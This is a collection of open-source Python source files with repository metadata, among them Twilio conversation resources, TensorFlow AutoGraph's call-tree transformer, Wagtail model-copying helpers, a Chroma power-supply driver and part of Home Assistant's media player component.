:rtype: datetime
"""
return self._properties['date_updated']
@property
def timers(self):
"""
:returns: Timer date values for this conversation.
:rtype: dict
"""
return self._properties['timers']
@property
def url(self):
"""
:returns: An absolute URL for this conversation.
:rtype: unicode
"""
return self._properties['url']
@property
def links(self):
"""
:returns: Absolute URLs to access the participants, messages and webhooks of this conversation.
:rtype: unicode
"""
return self._properties['links']
@property
def bindings(self):
"""
:returns: The bindings
:rtype: dict
"""
return self._properties['bindings']
def update(self, friendly_name=values.unset, date_created=values.unset,
date_updated=values.unset, attributes=values.unset,
messaging_service_sid=values.unset, state=values.unset,
timers_inactive=values.unset, timers_closed=values.unset,
unique_name=values.unset, x_twilio_webhook_enabled=values.unset):
"""
Update the ConversationInstance
:param unicode friendly_name: The human-readable name of this conversation.
:param datetime date_created: The date that this resource was created.
:param datetime date_updated: The date that this resource was last updated.
:param unicode attributes: An optional string metadata field you can use to store any data you wish.
:param unicode messaging_service_sid: The unique ID of the Messaging Service this conversation belongs to.
:param ConversationInstance.State state: Current state of this conversation.
:param unicode timers_inactive: ISO8601 duration when conversation will be switched to `inactive` state.
:param unicode timers_closed: ISO8601 duration when conversation will be switched to `closed` state.
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param ConversationInstance.WebhookEnabledType x_twilio_webhook_enabled: The X-Twilio-Webhook-Enabled HTTP request header
:returns: The updated ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationInstance
"""
return self._proxy.update(
friendly_name=friendly_name,
date_created=date_created,
date_updated=date_updated,
attributes=attributes,
messaging_service_sid=messaging_service_sid,
state=state,
timers_inactive=timers_inactive,
timers_closed=timers_closed,
unique_name=unique_name,
x_twilio_webhook_enabled=x_twilio_webhook_enabled,
)
def delete(self, x_twilio_webhook_enabled=values.unset):
"""
Deletes the ConversationInstance
:param ConversationInstance.WebhookEnabledType x_twilio_webhook_enabled: The X-Twilio-Webhook-Enabled HTTP request header
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._proxy.delete(x_twilio_webhook_enabled=x_twilio_webhook_enabled, )
def fetch(self):
"""
Fetch the ConversationInstance
:returns: The fetched ConversationInstance
:rtype: twilio.rest.conversations.v1.service.conversation.ConversationInstance
"""
return self._proxy.fetch()
@property
def participants(self):
"""
Access the participants
:returns: twilio.rest.conversations.v1.service.conversation.participant.ParticipantList
:rtype: twilio.rest.conversations.v1.service.conversation.participant.ParticipantList
"""
return self._proxy.participants
@property
def messages(self):
"""
Access the messages
:returns: twilio.rest.conversations.v1.service.conversation.message.MessageList
:rtype: twilio.rest.conversations.v1.service.conversation.message.MessageList
"""
return self._proxy.messages
@property
def webhooks(self):
"""
Access the webhooks
:returns: twilio.rest.conversations.v1.service.conversation.webhook.WebhookList
:rtype: twilio.rest.conversations.v1.service.conversation.webhook.WebhookList
"""
return self._proxy.webhooks
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Conversations.V1.ConversationInstance {}>'.format(context)
| {
"content_hash": "d27869aad1a09de95ca77e6d16fcefa3",
"timestamp": "",
"source": "github",
"line_count": 661,
"max_line_length": 129,
"avg_line_length": 38.94553706505295,
"alnum_prop": 0.6416501573243212,
"repo_name": "twilio/twilio-python",
"id": "07c34b4a0f30a0a72cae6f68a95b049f6a98b31f",
"size": "25758",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "twilio/rest/conversations/v1/service/conversation/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "234"
},
{
"name": "Makefile",
"bytes": "2157"
},
{
"name": "Python",
"bytes": "11241545"
}
],
"symlink_target": ""
} |
from django.conf.urls.defaults import *
urlpatterns = patterns('shopping',
# Example:
# (r'^server/', include('server.foo.urls')),
# Uncomment the admin/doc line below and add 'django.contrib.admindocs'
# to INSTALLED_APPS to enable admin documentation:
# (r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
# (r'^admin/(.*)', admin.site.root),
(r'pc_cube$', 'shopping.pc_cube'),
)
| {
"content_hash": "bf2612c78cc1af15bd535570efd3ce03",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 76,
"avg_line_length": 31.6,
"alnum_prop": 0.6518987341772152,
"repo_name": "eob/synckit-research",
"id": "b0fd69333983d35ff044a3e936885cd5845660c2",
"size": "474",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server/shopping/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "65239505"
},
{
"name": "PHP",
"bytes": "15712"
},
{
"name": "Python",
"bytes": "125913"
},
{
"name": "R",
"bytes": "21637"
},
{
"name": "Shell",
"bytes": "2697"
}
],
"symlink_target": ""
} |
"""Handles function calls, by generating compiled function names and calls.
Note: this transformer does not rename the top level object being converted;
that is the caller's responsibility.
Requires function_scopes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.python.autograph.core import converter
from tensorflow.python.autograph.pyct import anno
from tensorflow.python.autograph.pyct import ast_util
from tensorflow.python.autograph.pyct import parser
from tensorflow.python.autograph.pyct import templates
from tensorflow.python.autograph.utils import ag_logging
# TODO(mdan): Rename to FunctionCallsTransformer.
class _Function(object):
no_root = True
def __init__(self):
self.context_name = None
set_trace_warned = False
class CallTreeTransformer(converter.Base):
"""Transforms the call tree by renaming transformed symbols."""
def visit_Lambda(self, node):
if anno.hasanno(node, 'function_context_name'):
# Lambda functions created during the conversion process have no
# context manager.
self.state[_Function].enter()
self.state[_Function].context_name = anno.getanno(
node, 'function_context_name')
node = self.generic_visit(node)
self.state[_Function].exit()
else:
node = self.generic_visit(node)
return node
def visit_FunctionDef(self, node):
self.state[_Function].enter()
# Note: if the conversion process ever creates helper functions, this
# assumption will no longer hold.
assert anno.hasanno(node, 'function_context_name'), (
'The function_scopes converter always creates a scope for functions.')
self.state[_Function].context_name = anno.getanno(
node, 'function_context_name')
node.args = self.visit(node.args)
node.body = self.visit_block(node.body)
if self.state[_Function].level < 2:
# Top-level functions lose their decorator because the conversion is
# always just-in-time and by the time it happens the decorators are
# already set to be applied.
node.decorator_list = []
else:
# Inner functions are converted already, so we insert a decorator to
# prevent double conversion. Double conversion would work too, but this
# saves the overhead.
node.decorator_list.append(
parser.parse_expression('ag__.do_not_convert_internal'))
if node.returns:
node.returns = self.visit(node.returns)
self.state[_Function].exit()
return node
def visit_With(self, node):
# Context manager calls (in node.items) are not converted.
node.body = self.visit_block(node.body)
return node
def visit_Call(self, node):
full_name = str(anno.getanno(node.func, anno.Basic.QN, default=''))
function_context_name = self.state[_Function].context_name
node = self.generic_visit(node)
# TODO(mdan): Refactor converted_call as a 'Call' operator.
# Calls to the internal 'ag__' module are never converted (though their
# arguments might be).
if full_name.startswith('ag__.'):
return node
# Calls to the function context manager (inserted by function_scopes) are
# also safe.
if full_name.startswith(function_context_name + '.'):
return node
# Calls to pdb.set_trace or ipdb.set_trace are never converted. We don't use
# the normal mechanisms to bypass these literals because they are sensitive
# to the frame they are being called from.
# TODO(mdan): Generalize this to a "static whitelist" config.
if full_name in ('pdb.set_trace', 'ipdb.set_trace', 'breakpoint'):
global set_trace_warned
if not set_trace_warned:
# TODO(mdan): Update and shorten once available on tensorflow.org.
ag_logging.warn(
'Detected `pdb.set_trace()` in converted code. The code'
' generated by AutoGraph is not optimized for step-by-step'
' debugging. See https://github.com/tensorflow/tensorflow/'
'blob/master/tensorflow/python/autograph/g3doc/reference/'
'debugging.md.')
set_trace_warned = True
return node
if (full_name == 'print' and
not self.ctx.program.options.uses(converter.Feature.BUILTIN_FUNCTIONS)):
return node
func = node.func
starred_arg = None
normal_args = []
for a in node.args:
if isinstance(a, gast.Starred):
assert starred_arg is None, 'Multiple *args should be impossible.'
starred_arg = a
else:
normal_args.append(a)
if starred_arg is None:
args = templates.replace_as_expression('(args,)', args=normal_args)
else:
args = templates.replace_as_expression(
'(args,) + tuple(stararg)',
stararg=starred_arg.value,
args=normal_args)
kwargs_arg = None
normal_keywords = []
for k in node.keywords:
if k.arg is None:
assert kwargs_arg is None, 'Multiple **kwargs should be impossible.'
kwargs_arg = k
else:
normal_keywords.append(k)
if kwargs_arg is None:
if not normal_keywords:
kwargs = parser.parse_expression('None')
else:
kwargs = ast_util.keywords_to_dict(normal_keywords)
else:
kwargs = templates.replace_as_expression(
'dict(kwargs, **keywords)',
kwargs=kwargs_arg.value,
keywords=ast_util.keywords_to_dict(normal_keywords))
template = """
ag__.converted_call(func, options, args, kwargs, function_ctx)
"""
new_call = templates.replace_as_expression(
template,
func=func,
options=parser.parse_expression(function_context_name + '.callopts'),
args=args,
kwargs=kwargs,
function_ctx=function_context_name)
return new_call
def transform(node, ctx):
"""Transform function call to the compiled counterparts.
Args:
node: AST
ctx: EntityContext
Returns:
A tuple (node, new_names):
node: The transformed AST
new_names: set(string), containing any newly-generated names
"""
return CallTreeTransformer(ctx).visit(node)
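# Illustrative sketch (not part of the original module): the effect of
# CallTreeTransformer on a simple call, assuming a function scope named
# `fscope` was inserted by the function_scopes converter.
#
#   # before
#   x = foo(a, b=1)
#   # after (roughly)
#   x = ag__.converted_call(foo, fscope.callopts, (a,), {'b': 1}, fscope)
#
# Starred arguments are folded into the positional tuple and **kwargs are
# merged into the keyword dict, per visit_Call above.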
| {
"content_hash": "1a5c595997b3924a66427073ee0cef01",
"timestamp": "",
"source": "github",
"line_count": 187,
"max_line_length": 80,
"avg_line_length": 33.01069518716577,
"alnum_prop": 0.6705005669852584,
"repo_name": "DavidNorman/tensorflow",
"id": "5a5a2c95ddec1680457c5b5b262b8e70502c15dd",
"size": "6862",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tensorflow/python/autograph/converters/call_trees.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "4913"
},
{
"name": "Batchfile",
"bytes": "15272"
},
{
"name": "C",
"bytes": "774469"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "74659044"
},
{
"name": "CMake",
"bytes": "6545"
},
{
"name": "Dockerfile",
"bytes": "79827"
},
{
"name": "Go",
"bytes": "1670422"
},
{
"name": "HTML",
"bytes": "4680032"
},
{
"name": "Java",
"bytes": "827737"
},
{
"name": "Jupyter Notebook",
"bytes": "540800"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "1004638"
},
{
"name": "Makefile",
"bytes": "66660"
},
{
"name": "Objective-C",
"bytes": "105247"
},
{
"name": "Objective-C++",
"bytes": "297569"
},
{
"name": "PHP",
"bytes": "23553"
},
{
"name": "Pascal",
"bytes": "3752"
},
{
"name": "Pawn",
"bytes": "14529"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "37406546"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "4706"
},
{
"name": "Shell",
"bytes": "452517"
},
{
"name": "Smarty",
"bytes": "31460"
},
{
"name": "Swift",
"bytes": "62814"
}
],
"symlink_target": ""
} |
"""
WSGI config for project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings")
#application = get_wsgi_application()
application = get_wsgi_application()
application = DjangoWhiteNoise(application)
| {
"content_hash": "95d4490aa2e5b1c63797538f4142f90a",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 78,
"avg_line_length": 26,
"alnum_prop": 0.7884615384615384,
"repo_name": "nicogid/Projet4Moc1",
"id": "48e5c4fb36be11eb6b2d2640774c5b96c519be43",
"size": "520",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "api/project/project/wsgi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Arduino",
"bytes": "30059"
},
{
"name": "C",
"bytes": "6541"
},
{
"name": "HTML",
"bytes": "312"
},
{
"name": "Java",
"bytes": "26689"
},
{
"name": "Python",
"bytes": "45567"
}
],
"symlink_target": ""
} |
from django.contrib.contenttypes.fields import GenericRelation
from django.db import models
from modelcluster.fields import ParentalKey, ParentalManyToManyField
from modelcluster.models import ClusterableModel
def _extract_field_data(source, exclude_fields=None):
"""
Get dictionaries representing the model's field data.
    This excludes many-to-many fields (which are handled by _copy_m2m_relations).
"""
exclude_fields = exclude_fields or []
data_dict = {}
for field in source._meta.get_fields():
# Ignore explicitly excluded fields
if field.name in exclude_fields:
continue
# Ignore reverse relations
if field.auto_created:
continue
# Ignore reverse generic relations
if isinstance(field, GenericRelation):
continue
# Copy parental m2m relations
if field.many_to_many:
if isinstance(field, ParentalManyToManyField):
parental_field = getattr(source, field.name)
if hasattr(parental_field, "all"):
values = parental_field.all()
if values:
data_dict[field.name] = values
continue
# Ignore parent links (page_ptr)
if isinstance(field, models.OneToOneField) and field.remote_field.parent_link:
continue
if isinstance(field, models.ForeignKey):
# Use attname to copy the ID instead of retrieving the instance
# Note: We first need to set the field to None to unset any object
# that's there already just setting _id on its own won't change the
# field until its saved.
data_dict[field.name] = None
data_dict[field.attname] = getattr(source, field.attname)
else:
data_dict[field.name] = getattr(source, field.name)
return data_dict
def _copy_m2m_relations(source, target, exclude_fields=None, update_attrs=None):
"""
Copies non-ParentalManyToMany m2m relations
"""
update_attrs = update_attrs or {}
exclude_fields = exclude_fields or []
for field in source._meta.get_fields():
# Copy m2m relations. Ignore explicitly excluded fields, reverse relations, and Parental m2m fields.
if (
field.many_to_many
and field.name not in exclude_fields
and not field.auto_created
and not isinstance(field, ParentalManyToManyField)
):
try:
# Do not copy m2m links with a through model that has a ParentalKey to the model being copied - these will be copied as child objects
through_model_parental_links = [
field
for field in field.through._meta.get_fields()
if isinstance(field, ParentalKey)
and issubclass(source.__class__, field.related_model)
]
if through_model_parental_links:
continue
except AttributeError:
pass
if field.name in update_attrs:
value = update_attrs[field.name]
else:
value = getattr(source, field.name).all()
getattr(target, field.name).set(value)
def _copy(source, exclude_fields=None, update_attrs=None):
data_dict = _extract_field_data(source, exclude_fields=exclude_fields)
target = source.__class__(**data_dict)
if update_attrs:
for field, value in update_attrs.items():
if field not in data_dict:
continue
setattr(target, field, value)
if isinstance(source, ClusterableModel):
child_object_map = source.copy_all_child_relations(
target, exclude=exclude_fields
)
else:
child_object_map = {}
return target, child_object_map
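# Illustrative sketch (not part of the original module): how these helpers
# are typically chained when duplicating an instance; `page`, `new_title`
# and the excluded field names are placeholders.
#
#   target, child_map = _copy(page, exclude_fields=['id', 'slug'],
#                             update_attrs={'title': new_title})
#   target.save()                      # the copy must exist before m2m links
#   _copy_m2m_relations(page, target, exclude_fields=['id', 'slug'])
#
# Foreign keys are copied by attname (the *_id column), so the copy points
# at the same related rows without fetching them.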
| {
"content_hash": "07a706a1c8a3d0b8a97bc4f5c3423fc3",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 149,
"avg_line_length": 34.5929203539823,
"alnum_prop": 0.6045024302890765,
"repo_name": "thenewguy/wagtail",
"id": "178c260ba8ec6db5f84d73404cb78648f20a335d",
"size": "3909",
"binary": false,
"copies": "4",
"ref": "refs/heads/tng_master",
"path": "wagtail/models/copying.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "2522"
},
{
"name": "Dockerfile",
"bytes": "2041"
},
{
"name": "HTML",
"bytes": "593033"
},
{
"name": "JavaScript",
"bytes": "615631"
},
{
"name": "Makefile",
"bytes": "1413"
},
{
"name": "Python",
"bytes": "6571572"
},
{
"name": "SCSS",
"bytes": "219986"
},
{
"name": "Shell",
"bytes": "6845"
},
{
"name": "TypeScript",
"bytes": "288325"
}
],
"symlink_target": ""
} |
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2013-2014 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .chroma62000p import *
class chroma62012p40120(chroma62000p):
"Chroma ATE 62012P-40-120 series IVI DC power supply driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', '62012P-40-120')
super(chroma62012p40120, self).__init__(*args, **kwargs)
self._output_count = 1
self._output_spec = [
{
'range': {
'P40V': (40.0, 120.0)
},
'ovp_max': 44.0,
'ocp_max': 132.0,
'voltage_max': 40.0,
'current_max': 120.0
}
]
self._init_outputs()
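    # Illustrative sketch (not part of the original module): connecting to
    # the supply over VISA and programming a setpoint within the 40 V / 120 A
    # limits declared above, assuming the chroma subpackage is exposed like
    # the other python-ivi drivers. The resource string is a placeholder.
    #
    #   import ivi
    #   psu = ivi.chroma.chroma62012p40120("TCPIP0::192.168.1.50::INSTR")
    #   psu.outputs[0].voltage_level = 24.0
    #   psu.outputs[0].current_limit = 10.0
    #   psu.outputs[0].enabled = True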
| {
"content_hash": "b1907642195eb9cc067eeab19930f7ed",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 77,
"avg_line_length": 34.074074074074076,
"alnum_prop": 0.6603260869565217,
"repo_name": "margguo/python-ivi",
"id": "18991709fd7ed085cacdb030b46322870121519c",
"size": "1840",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "ivi/chroma/chroma62012p40120.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1738999"
}
],
"symlink_target": ""
} |
"""Component to interface with various media players."""
import asyncio
import base64
import collections
from datetime import timedelta
import functools as ft
import hashlib
import logging
from random import SystemRandom
from typing import Optional
from urllib.parse import urlparse
from aiohttp import web
from aiohttp.hdrs import CACHE_CONTROL, CONTENT_TYPE
import async_timeout
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.components.http import KEY_AUTHENTICATED, HomeAssistantView
from homeassistant.const import (
SERVICE_MEDIA_NEXT_TRACK,
SERVICE_MEDIA_PAUSE,
SERVICE_MEDIA_PLAY,
SERVICE_MEDIA_PLAY_PAUSE,
SERVICE_MEDIA_PREVIOUS_TRACK,
SERVICE_MEDIA_SEEK,
SERVICE_MEDIA_STOP,
SERVICE_SHUFFLE_SET,
SERVICE_TOGGLE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
SERVICE_VOLUME_DOWN,
SERVICE_VOLUME_MUTE,
SERVICE_VOLUME_SET,
SERVICE_VOLUME_UP,
STATE_IDLE,
STATE_OFF,
STATE_PLAYING,
)
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.config_validation import ( # noqa: F401
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
)
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.loader import bind_hass
from .const import (
ATTR_APP_ID,
ATTR_APP_NAME,
ATTR_INPUT_SOURCE,
ATTR_INPUT_SOURCE_LIST,
ATTR_MEDIA_ALBUM_ARTIST,
ATTR_MEDIA_ALBUM_NAME,
ATTR_MEDIA_ARTIST,
ATTR_MEDIA_CHANNEL,
ATTR_MEDIA_CONTENT_ID,
ATTR_MEDIA_CONTENT_TYPE,
ATTR_MEDIA_DURATION,
ATTR_MEDIA_ENQUEUE,
ATTR_MEDIA_EPISODE,
ATTR_MEDIA_PLAYLIST,
ATTR_MEDIA_POSITION,
ATTR_MEDIA_POSITION_UPDATED_AT,
ATTR_MEDIA_SEASON,
ATTR_MEDIA_SEEK_POSITION,
ATTR_MEDIA_SERIES_TITLE,
ATTR_MEDIA_SHUFFLE,
ATTR_MEDIA_TITLE,
ATTR_MEDIA_TRACK,
ATTR_MEDIA_VOLUME_LEVEL,
ATTR_MEDIA_VOLUME_MUTED,
ATTR_SOUND_MODE,
ATTR_SOUND_MODE_LIST,
DOMAIN,
SERVICE_CLEAR_PLAYLIST,
SERVICE_PLAY_MEDIA,
SERVICE_SELECT_SOUND_MODE,
SERVICE_SELECT_SOURCE,
SUPPORT_CLEAR_PLAYLIST,
SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE,
SUPPORT_PLAY,
SUPPORT_PLAY_MEDIA,
SUPPORT_PREVIOUS_TRACK,
SUPPORT_SEEK,
SUPPORT_SELECT_SOUND_MODE,
SUPPORT_SELECT_SOURCE,
SUPPORT_SHUFFLE_SET,
SUPPORT_STOP,
SUPPORT_TURN_OFF,
SUPPORT_TURN_ON,
SUPPORT_VOLUME_MUTE,
SUPPORT_VOLUME_SET,
SUPPORT_VOLUME_STEP,
)
# mypy: allow-untyped-defs, no-check-untyped-defs
_LOGGER = logging.getLogger(__name__)
_RND = SystemRandom()
ENTITY_ID_FORMAT = DOMAIN + ".{}"
ENTITY_IMAGE_URL = "/api/media_player_proxy/{0}?token={1}&cache={2}"
CACHE_IMAGES = "images"
CACHE_MAXSIZE = "maxsize"
CACHE_LOCK = "lock"
CACHE_URL = "url"
CACHE_CONTENT = "content"
ENTITY_IMAGE_CACHE = {CACHE_IMAGES: collections.OrderedDict(), CACHE_MAXSIZE: 16}
SCAN_INTERVAL = timedelta(seconds=10)
DEVICE_CLASS_TV = "tv"
DEVICE_CLASS_SPEAKER = "speaker"
DEVICE_CLASSES = [DEVICE_CLASS_TV, DEVICE_CLASS_SPEAKER]
DEVICE_CLASSES_SCHEMA = vol.All(vol.Lower, vol.In(DEVICE_CLASSES))
MEDIA_PLAYER_PLAY_MEDIA_SCHEMA = {
vol.Required(ATTR_MEDIA_CONTENT_TYPE): cv.string,
vol.Required(ATTR_MEDIA_CONTENT_ID): cv.string,
vol.Optional(ATTR_MEDIA_ENQUEUE): cv.boolean,
}
ATTR_TO_PROPERTY = [
ATTR_MEDIA_VOLUME_LEVEL,
ATTR_MEDIA_VOLUME_MUTED,
ATTR_MEDIA_CONTENT_ID,
ATTR_MEDIA_CONTENT_TYPE,
ATTR_MEDIA_DURATION,
ATTR_MEDIA_POSITION,
ATTR_MEDIA_POSITION_UPDATED_AT,
ATTR_MEDIA_TITLE,
ATTR_MEDIA_ARTIST,
ATTR_MEDIA_ALBUM_NAME,
ATTR_MEDIA_ALBUM_ARTIST,
ATTR_MEDIA_TRACK,
ATTR_MEDIA_SERIES_TITLE,
ATTR_MEDIA_SEASON,
ATTR_MEDIA_EPISODE,
ATTR_MEDIA_CHANNEL,
ATTR_MEDIA_PLAYLIST,
ATTR_APP_ID,
ATTR_APP_NAME,
ATTR_INPUT_SOURCE,
ATTR_SOUND_MODE,
ATTR_MEDIA_SHUFFLE,
]
@bind_hass
def is_on(hass, entity_id=None):
"""
Return true if specified media player entity_id is on.
    Check all media players if no entity_id is specified.
"""
entity_ids = [entity_id] if entity_id else hass.states.entity_ids(DOMAIN)
return any(
not hass.states.is_state(entity_id, STATE_OFF) for entity_id in entity_ids
)
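# Illustrative sketch: is_on() above treats any state other than STATE_OFF
# as "on", so a paused or idle player still counts. The entity id is a
# placeholder.
#
#   if is_on(hass, "media_player.living_room"):
#       ...                      # player is idle, paused or playing
#   if is_on(hass):              # True if any media player is not off
#       ...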
WS_TYPE_MEDIA_PLAYER_THUMBNAIL = "media_player_thumbnail"
SCHEMA_WEBSOCKET_GET_THUMBNAIL = websocket_api.BASE_COMMAND_MESSAGE_SCHEMA.extend(
{"type": WS_TYPE_MEDIA_PLAYER_THUMBNAIL, "entity_id": cv.entity_id}
)
def _rename_keys(**keys):
"""Create validator that renames keys.
Necessary because the service schema names do not match the command parameters.
Async friendly.
"""
def rename(value):
for to_key, from_key in keys.items():
if from_key in value:
value[to_key] = value.pop(from_key)
return value
return rename
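# Illustrative sketch: what the validator produced by _rename_keys does to
# a service call payload, mirroring its use for SERVICE_VOLUME_SET further
# down. The entity id is a placeholder.
#
#   rename = _rename_keys(volume=ATTR_MEDIA_VOLUME_LEVEL)
#   rename({"entity_id": "media_player.living_room", "volume_level": 0.5})
#   # -> {"entity_id": "media_player.living_room", "volume": 0.5}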
async def async_setup(hass, config):
"""Track states and offer events for media_players."""
component = hass.data[DOMAIN] = EntityComponent(
logging.getLogger(__name__), DOMAIN, hass, SCAN_INTERVAL
)
hass.components.websocket_api.async_register_command(
WS_TYPE_MEDIA_PLAYER_THUMBNAIL,
websocket_handle_thumbnail,
SCHEMA_WEBSOCKET_GET_THUMBNAIL,
)
hass.http.register_view(MediaPlayerImageView(component))
await component.async_setup(config)
component.async_register_entity_service(
SERVICE_TURN_ON, {}, "async_turn_on", [SUPPORT_TURN_ON]
)
component.async_register_entity_service(
SERVICE_TURN_OFF, {}, "async_turn_off", [SUPPORT_TURN_OFF]
)
component.async_register_entity_service(
SERVICE_TOGGLE, {}, "async_toggle", [SUPPORT_TURN_OFF | SUPPORT_TURN_ON],
)
component.async_register_entity_service(
SERVICE_VOLUME_UP,
{},
"async_volume_up",
[SUPPORT_VOLUME_SET, SUPPORT_VOLUME_STEP],
)
component.async_register_entity_service(
SERVICE_VOLUME_DOWN,
{},
"async_volume_down",
[SUPPORT_VOLUME_SET, SUPPORT_VOLUME_STEP],
)
component.async_register_entity_service(
SERVICE_MEDIA_PLAY_PAUSE,
{},
"async_media_play_pause",
[SUPPORT_PLAY | SUPPORT_PAUSE],
)
component.async_register_entity_service(
SERVICE_MEDIA_PLAY, {}, "async_media_play", [SUPPORT_PLAY]
)
component.async_register_entity_service(
SERVICE_MEDIA_PAUSE, {}, "async_media_pause", [SUPPORT_PAUSE]
)
component.async_register_entity_service(
SERVICE_MEDIA_STOP, {}, "async_media_stop", [SUPPORT_STOP]
)
component.async_register_entity_service(
SERVICE_MEDIA_NEXT_TRACK, {}, "async_media_next_track", [SUPPORT_NEXT_TRACK],
)
component.async_register_entity_service(
SERVICE_MEDIA_PREVIOUS_TRACK,
{},
"async_media_previous_track",
[SUPPORT_PREVIOUS_TRACK],
)
component.async_register_entity_service(
SERVICE_CLEAR_PLAYLIST, {}, "async_clear_playlist", [SUPPORT_CLEAR_PLAYLIST],
)
component.async_register_entity_service(
SERVICE_VOLUME_SET,
vol.All(
cv.make_entity_service_schema(
{vol.Required(ATTR_MEDIA_VOLUME_LEVEL): cv.small_float}
),
_rename_keys(volume=ATTR_MEDIA_VOLUME_LEVEL),
),
"async_set_volume_level",
[SUPPORT_VOLUME_SET],
)
component.async_register_entity_service(
SERVICE_VOLUME_MUTE,
vol.All(
cv.make_entity_service_schema(
{vol.Required(ATTR_MEDIA_VOLUME_MUTED): cv.boolean}
),
_rename_keys(mute=ATTR_MEDIA_VOLUME_MUTED),
),
"async_mute_volume",
[SUPPORT_VOLUME_MUTE],
)
component.async_register_entity_service(
SERVICE_MEDIA_SEEK,
vol.All(
cv.make_entity_service_schema(
{
vol.Required(ATTR_MEDIA_SEEK_POSITION): vol.All(
vol.Coerce(float), vol.Range(min=0)
)
}
),
_rename_keys(position=ATTR_MEDIA_SEEK_POSITION),
),
"async_media_seek",
[SUPPORT_SEEK],
)
component.async_register_entity_service(
SERVICE_SELECT_SOURCE,
{vol.Required(ATTR_INPUT_SOURCE): cv.string},
"async_select_source",
[SUPPORT_SELECT_SOURCE],
)
component.async_register_entity_service(
SERVICE_SELECT_SOUND_MODE,
{vol.Required(ATTR_SOUND_MODE): cv.string},
"async_select_sound_mode",
[SUPPORT_SELECT_SOUND_MODE],
)
component.async_register_entity_service(
SERVICE_PLAY_MEDIA,
vol.All(
cv.make_entity_service_schema(MEDIA_PLAYER_PLAY_MEDIA_SCHEMA),
_rename_keys(
media_type=ATTR_MEDIA_CONTENT_TYPE,
media_id=ATTR_MEDIA_CONTENT_ID,
enqueue=ATTR_MEDIA_ENQUEUE,
),
),
"async_play_media",
[SUPPORT_PLAY_MEDIA],
)
component.async_register_entity_service(
SERVICE_SHUFFLE_SET,
{vol.Required(ATTR_MEDIA_SHUFFLE): cv.boolean},
"async_set_shuffle",
[SUPPORT_SHUFFLE_SET],
)
return True
async def async_setup_entry(hass, entry):
"""Set up a config entry."""
return await hass.data[DOMAIN].async_setup_entry(entry)
async def async_unload_entry(hass, entry):
"""Unload a config entry."""
return await hass.data[DOMAIN].async_unload_entry(entry)
class MediaPlayerDevice(Entity):
"""ABC for media player devices."""
_access_token: Optional[str] = None
# Implement these for your media player
@property
def state(self):
"""State of the player."""
return None
@property
def access_token(self) -> str:
"""Access token for this media player."""
if self._access_token is None:
self._access_token = hashlib.sha256(
_RND.getrandbits(256).to_bytes(32, "little")
).hexdigest()
return self._access_token
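    # Illustrative sketch: the token above is what callers embed in
    # ENTITY_IMAGE_URL so the image proxy view can authenticate requests
    # without exposing credentials. The entity id is a placeholder.
    #
    #   ENTITY_IMAGE_URL.format("media_player.living_room",
    #                           player.access_token, player.media_image_hash)
    #   # -> "/api/media_player_proxy/media_player.living_room?token=...&cache=..."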
@property
def volume_level(self):
